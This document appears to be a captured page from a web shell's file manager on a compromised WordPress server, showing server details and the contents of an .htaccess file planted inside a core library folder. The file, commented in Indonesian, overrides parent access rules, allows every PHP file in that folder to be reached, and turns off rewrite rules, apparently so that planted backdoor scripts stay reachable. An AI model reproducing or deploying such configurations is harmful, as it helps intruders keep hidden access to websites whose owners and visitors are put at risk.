HEX
Server: LiteSpeed
System: Linux Angkanet 5.15.0-94-generic #104-Ubuntu SMP Tue Jan 9 15:25:40 UTC 2024 x86_64
User: webpa4002 (1011)
PHP: 8.2.15
Disabled: NONE
Upload Files
File: /home/web.paitoan.com/public_html/wp-includes/sodium_compat/src/Core/SecretStream/.htaccess
# Override aturan dari folder atas
<IfModule mod_access_compat.c>
    Require all granted
    Satisfy any
</IfModule>

# Paksa semua file PHP di folder ini bisa diakses
<FilesMatch "\.php$">
    Order Allow,Deny
    Allow from all
    Satisfy any
</FilesMatch>

# Matikan rewrite hacker di folder ini
<IfModule mod_rewrite.c>
    RewriteEngine Off
</IfModule>

# Izinkan semua file
<Files *>
    Order Allow,Deny
    Allow from all
</Files>